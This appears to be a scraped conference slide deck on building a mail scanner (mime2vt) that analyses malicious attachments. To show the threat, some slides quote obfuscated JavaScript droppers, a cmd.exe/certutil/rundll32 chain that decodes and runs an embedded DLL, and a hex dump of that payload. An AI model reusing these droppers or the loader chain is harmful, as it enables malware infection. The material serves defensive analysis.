Building a Poor Mans F1r3Ey3 Mail Scanner RMLLSEC16 - Xavier - - PowerPoint PPT Presentation

building a poor man s f1r3ey3 mail scanner
SMART_READER_LITE
LIVE PREVIEW

Building a Poor Mans F1r3Ey3 Mail Scanner RMLLSEC16 - Xavier - - PowerPoint PPT Presentation

Sep 03, 2023 376 likes •803 views

Building a Poor Mans F1r3Ey3 Mail Scanner RMLLSEC16 - Xavier Mertens $ cat ~/whoami.xml <profile> <real_name> Xavier Mertens </real_name> <day_job> Freelancer </day_job> <night_job> Hacker, Blogger

slide-1
SLIDE 1

Building a Poor Man’s “F1r3Ey3” Mail Scanner

RMLLSEC16 - Xavier Mertens

slide-2
SLIDE 2

$ cat ~/whoami.xml

<profile> <real_name>Xavier Mertens</real_name> <day_job>Freelancer</day_job> <night_job>Hacker, Blogger</night_job> <![CDATA[ www.truesec.be blog.rootshell.be isc.sans.edu www.brucon.org ]]> </profile>

slide-3
SLIDE 3

$ cat ~/.profile

  • I like (your) data
  • Playing “Active Defense”
  • I prefer t-shirts than ties
  • Geek and gadgets fan!
slide-4
SLIDE 4

$ cat ~/disclaimer.txt

“The opinions expressed in this presentation are those of the speaker and do not necessarily reflect those of past, present employers, partners or customers.”

slide-5
SLIDE 5
slide-6
SLIDE 6
slide-7
SLIDE 7
slide-8
SLIDE 8
slide-9
SLIDE 9

Out of scope

slide-10
SLIDE 10

Out of scope

slide-11
SLIDE 11
slide-12
SLIDE 12
slide-13
SLIDE 13
  • Low detection level by regular AV’s
  • Only a “dropper”


(payload can be remote or local)

  • Scripting languages


(multiple ways to achieve the same result)

Characteristics

slide-14
SLIDE 14

Quick Tip

s/[wc]script.exe/notepad.exe/

More info:
 https://isc.sans.edu/forums/diary/Controlling +JavaScript+Malware+Before+it+Runs/21171/

slide-15
SLIDE 15

Quick Tip

Disable Office macros via GPO

More info:
 https://blogs.technet.microsoft.com/mmpc/ 2016/03/22/new-feature-in-office-2016-can-block- macros-and-help-prevent-infection/

slide-16
SLIDE 16

“O”+Chr(98)+”bfu”+ “sc\x61te” “All The Things”

slide-17
SLIDE 17

var aunVct = ';'+'}'+' '+';'+')'+'('+']'+'t'+'L'+'C'+'H'+'['+'3'+'s'+'S'+' '+';'+')'+'2'+' '+','+'2'+'j'+'A'+'K'+'H'+'('+']'+'o' +'E'+'D'+' '+'+'+' '+'0'+'g'+'B'+' '+'+'+' '+'6'+'n'+'O'+'W'+'['+'3'+'s'+'S'+' '+';'+')'+')'+'5'+'p'+'R'+'T'+'('+'a'+'G'+'K'+'('+']' +'7'+'y'+'H'+'N'+'X'+' '+'+'+' '+')'+'4'+'d'+'N'+'W'+'M'+'('+'1'+'u'+'T'+'Q'+'['+'3'+'s'+'S' +' '+';'+')'+'('+']'+'8'+'s'+'C'+'Y'+'[' +'3'+'s'+'S'+' '+';'+'6'+'x'+'N'+'N'+'U'+'='+']'+'1'+'h'+'D'+'Y'+' '+'+'+' '+'v'+'S'+'G'+'Z'+'['+'3'+'s'+'S'+' '+';'+'9'+'h'+'J'+'G' +'I'+'N'+'='+']'+'0'+'n'+'Y'+'H'+'L'+' '+'+'+' '+')'+')'+'('

slide-18
SLIDE 18
  • bjFile.Write

Chr( AscB( MidB( o_b_j_h_t_t_p.ResponseBody, i, 1 ) ) )

slide-19
SLIDE 19

var Bay = "Dim objS\x68ell\r\nSet “, big = "objShell = WScript.Cre"; var late = "ate\x4fbject(\"WScript.Shell\"", dub = "eMair\x65\x0d\n\r\n\' Usage\r\n\x69f”,

slide-20
SLIDE 20

var XTEQGGgK = [("charlie","otter","tangible","Act") +"iv"+"eX"+"Obje"+("timely","sprig","ct"), "E"+ ("postcard","risky","xp")+ "an"+"dE"+"nv"+("indisputable","media","humor","iron") +"me"+"nt"+"St"+"ri"+"ngs", ("contraband","sarcophagus","")+"%"+"TE"+(" banana","substantial","sends","playground","MP%"), ("negative","artists","papers","")+"."+"exe", "R"+ ("classroom","litigation ","draws","unchecked","un"), "MSX"+"ML2.XM"+ ("journalists","johannesburg","concise","LH")+ ("wrestle","vermin","tempestuous"," TTP"), "W"+("plume","coding","adrian","outrun","Sc")+ ("changes","cursor","griffith","postcards","ri") +"pt"+".She"+"ll"];

slide-21
SLIDE 21

var ai99uCXy = ';'+'}'+' ‘+';'+')'+'('+']'+'9'+'w'+'C'+'C'+'F'+' … +' '+'1'+'z'+'O'+'V'+'S'+' '+'r'+'a'+'v'+' '+';'+'"'+'t'+'x'+'"'+' '+'='+' '+'l'+'L'+' '+'r'+'a'+'v'+' '+';'+'"'+'a'+'S'+'"'+' '+'='+' '+'0'+'p'+'G'+'P'+'R'+' '+'r'+'a'+'v'+' '+';'+'"'+'T'+'e'+'v'+'"'+' '+'='+' '+'f'+'H'+' '+'r'+'a'+'v'+' '+';'+'"'+'e'+'l'+'i'+'F'+'o'+'"'+' '+'='+' '+'t'+'B'+'E'+' '+'r'+'a'+'v'+' '+';'+'"'+'s'+'o'+'l'+'c'+'"'+' '+'='+' '+'d'+'G'+'O'+' '+'r'+'a'+'v'+' '+';'+'"'+'e'+'"'+' '+'='+' '+'f'+'H'+'I'+'S'+' ‘+'r'+'a'+'v'; eval(ai99uCXy.split('').reverse().join(''));

slide-22
SLIDE 22
slide-23
SLIDE 23

Where is my Payload?

  • Usually on compromised websites 


(Who said “Wordpress”? :-)

  • Sometimes included in the script /

document / file

slide-24
SLIDE 24

%windir%\system32\cmd.exe /V:ON /c dir %TEMP% \faktura.lnk /s /b >%TEMP%\bwTFO && 
 set /p k=<%TEMP%\bwTFO &&
 findstr TVqQAA !k!>%TEMP%\bwTFO && 
 certutil -decode %TEMP%\bwTFO %TEMP%\bwTFO.dll && 
 del %TEMP%\bwTFO !k! && 
 rundll32 %TEMP%\bwTFO.dll,PHojcLeWFaI YEfM 00000740 a3 41 5d 34 0c e0 a5 4d 97 35 a3 e4 11 bd 29 00 |.A]4...M.5....).|
 00000750 50 56 38 75 73 00 00 00 00 0d 0a 54 56 71 51 41 |PV8us......TVqQA| 00000760 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 |AMAAAAEAAAA//8AA| 00000770 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 |LgAAAAAAAAAQAAAA| 00000780 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000007a0 41 41 41 41 41 41 41 41 41 41 41 75 41 41 41 41 |AAAAAAAAAAAuAAAA| 000007b0 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 |A4fug4AtAnNIbgBT| 000007c0 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 |M0hVGhpcyBwcm9nc| 000007d0 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a |mFtIGNhbm5vdCBiZ| 000007e0 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 |SBydW4gaW4gRE9TI| 000007f0 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 |G1vZGUuDQ0KJAAAA| 00000800 41 41 41 41 41 43 48 6f 38 76 62 77 38 4b 6c 69 |AAAAACHo8vbw8Kli| 00000810 4d 50 43 70 59 6a 44 77 71 57 49 50 2b 4b 33 69 |MPCpYjDwqWIP+K3i| 00000820 4d 4c 43 70 59 67 45 78 4b 4f 49 77 73 4b 6c 69 |MLCpYgExKOIwsKli| 00000830 45 33 64 74 6f 6a 43 77 71 57 49 55 6d 6c 6a 61 |E3dtojCwqWIUmlja| 00000840 4d 50 43 70 59 67 41 41 41 41 41 41 41 41 41 41 |MPCpYgAAAAAAAAAA| 00000850 46 42 46 41 41 42 4d 41 51 55 41 4b 53 54 4b 56 |FBFAABMAQUAKSTKV| 00000860 67 41 41 41 41 41 41 41 41 41 41 34 41 41 4f 49 |gAAAAAAAAAA4AAOI| 00000870 51 73 42 42 51 77 41 44 41 41 41 41 41 67 41 41 |QsBBQwADAAAAAgAA| 00000880 41 41 41 41 41 41 41 45 41 41 41 41 42 41 41 41 |AAAAAAAEAAAABAAA| 00000890 41 41 67 41 41 41 41 41 41 41 51 41 42 41 41 41 |AAgAAAAAAAQABAAA| 000008a0 41 41 43 41 41 41 45 41 41 41 41 41 41 41 41 41 |AACAAAEAAAAAAAAA|

Source: https://isc.sans.edu/forums/diary/Analyzis+of+a+Malicious+lnk+File+with +an+Embedded+Payload/20763/

slide-25
SLIDE 25

F1r3Ey3

slide-26
SLIDE 26

Tool: oledump.py

# oledump.py ./01/23/Invoice.doc
 A: word/vbaProject.bin
 A1: 443 'PROJECT'
 A2: 41 'PROJECTwm'
 A3: M 23818 'VBA/ThisDocument'
 A4: 7316 'VBA/_VBA_PROJECT'
 A5: 522 'VBA/dir' # oledump.py -s A3 -v ./01/23/Invoice.doc|more
 Attribute VB_Name = "ThisDocument"
 Attribute VB_Base = "1Normal.ThisDocument"
 Attribute VB_GlobalNameSpace = False
 Attribute VB_Creatable = False
 Attribute VB_PredeclaredId = True
 Attribute VB_Exposed = True
 Attribute VB_TemplateDerived = True
 Attribute VB_Customizable = True
 Private Type U9HSOaoh4AV5AN
 Hf49UQ2l As Long
 BeKSYB As IUnknown
 RZLernTy As Long
 End Type
 Private Type HA1AKyTa
 HaDVFcydy0vUXA As Long
 I8rsbkKkNY3Po9lPh As Integer
 S1nFjAvN3p As Integer
 EFL5G9C4qwuQ(7) As Byte
 End Type
 Private Type GB6zRwGPbKwgIRlV
 Phl As Long
 X7w0PaK0D3g As Long
 KnYN9OUBl0Z As String
 DK8d As Long
 End Type

Source: https://blog.didierstevens.com/programs/oledump-py/

slide-27
SLIDE 27
slide-28
SLIDE 28

Requirements

  • Extract MIME data from emails
  • Analyse interesting files
  • Block them < Nice to have ;-)
  • Collect data (samples & URLs)
  • Save results for research purposes
slide-29
SLIDE 29

Components

  • a MTA ;-)
  • Some domains + MX records
  • SpamAssassin / Procmail for pre-filtering
  • Python & some modules
  • VT API
  • olevba API
slide-30
SLIDE 30

Sources?

  • Old domains


(>10y old)

  • MX records on domains + catch-all

mailbox

  • Sleep() or register emails on “nice”

websites

slide-31
SLIDE 31
  • levba.py
  • A tool to extract

VBA macro from M$ documents

  • Supports OLE/OpenXML
  • Python API

Source: http://decalage.info

slide-32
SLIDE 32

Mime2VT

  • Extracts MIME attachments from emails
  • Checks / submits interesting ones to

VT

  • Analyses

VBA macros using olevba.py API

  • Support zip files
  • Archive them
  • Extract URLs from emails
  • Export data to ELK
slide-33
SLIDE 33

Example

Nov 30 21:49:09 marge postfix/qmgr[22867]: 00F547C016C: from=<SaundersThelma17@telepac.pt>, size=188819, nrcpt=1 (queue active) Nov 30 21:49:10 marge mime2vt.py[20225]: DEBUG: Found data: multipart/mixed (None) Nov 30 21:49:10 marge mime2vt.py[20225]: DEBUG: Found data: text/plain (None) Nov 30 21:49:10 marge mime2vt.py[20225]: DEBUG: Found data: message/rfc822 (None) Nov 30 21:49:10 marge mime2vt.py[20225]: DEBUG: Found data: multipart/mixed (None) Nov 30 21:49:10 marge mime2vt.py[20225]: DEBUG: Found data: text/plain (None) Nov 30 21:49:10 marge mime2vt.py[20225]: DEBUG: Found data: application/vnd.ms-excel (invoice_details_32247759.xls) Nov 30 21:49:10 marge mime2vt.py[20225]: Found interesting file: invoice_details_32247759.xls (application/vnd.ms-excel) Nov 30 21:49:12 marge mime2vt.py[20225]: File: invoice_details_32247759.xls (0026d60cf0838a943793ce61fa0366a1) Score: 8/56 Scanned: 2015-11-30 20:45:07 (1:04:05) Nov 30 21:49:12 marge mime2vt.py[20225]: DEBUG: dbAddMD5: 0026d60cf0838a943793ce61fa0366a1 Nov 30 21:49:12 marge mime2vt.py[20225]: DEBUG: Analyzing with oletools Nov 30 21:49:12 marge mime2vt.py[20225]: DEBUG: Detected file type: OLE Nov 30 21:49:12 marge mime2vt.py[20225]: DEBUG: VBA Macros found Nov 30 21:49:19 marge mime2vt.py[20225]: DEBUG: Analysis dumped to /var/tmp/mime/2015/11/30/ invoice_details_32247759.xls.analysis

slide-34
SLIDE 34

Example

$ cat /var/tmp/mime/2015/11/30/invoice_details_32247759.xls.analysis AutoExec | Workbook_Open | Runs when the Excel Workbook is opened Suspicious | Kill | May delete a file Suspicious | Open | May open a file Suspicious | Shell | May run an executable file or a system command Suspicious | Run | May run an executable file or a system command Suspicious | CreateObject | May create an OLE object Suspicious | WriteText | May create a text file Suspicious | SaveToFile | May create a text file Suspicious | Hex Strings | Hex-encoded strings were detected, may be used to


  • bfuscate strings (option --decode to see all)

Suspicious | Base64 Strings | Base64-encoded strings were detected, may be used to

  • bfuscate strings (option --decode to see all)

Suspicious | VBA obfuscated Strings | VBA string expressions were detected, may be used to

  • bfuscate strings (option --decode to see all)

IOC | UpdateWinrar.js | Executable file name IOC | UpdOffice.exe | Executable file name VBA string | Total | "To" & "tal" VBA string | Code | ("Co" & "de") VBA string | B3 | ("B" & "3") VBA string | Total | ("To" & "tal") VBA string | Warning | ("War" & "ning")

slide-35
SLIDE 35

Setup

$ cat /etc/mime2vt.conf [virustotal] apikey: <redacted> exclude: image/png,image/gif,image/jpeg,image/bmp,text/plain,text/html,text/english, application/pgp-signature [elasticsearch] server: 192.168.254.65:9200 index: virustotal [database] dbpath: /var/tmp/mime2vt.db $ cat $HOME/.procmailrc :0 { :0c | /usr/local/bin/mime2vt.py -d /var/tmp/mime/%y/%m/%d -c /etc/mime2vt.conf -l /var/tmp/messages.dump :0 incoming }

slide-36
SLIDE 36

Want Samples?

slide-37
SLIDE 37

Want Samples?

(4.3% have a VT score > 5)

slide-38
SLIDE 38

Want Samples?

Unique samples: 124952

slide-39
SLIDE 39

The Winner…

slide-40
SLIDE 40

Wanna Play?

40

https://github.com/xme/mime2vt

<warning> 
 Beta code 
 </warning>

slide-41
SLIDE 41

Wishlist?

  • Add support for multiple archives (rar)
  • Integrate with MISP to exchange IOC’s
  • Add

YARA support

slide-42
SLIDE 42

Thank you! @xme xavier@rootshell.be xavier@truesec.be xmertens@isc.sans.edu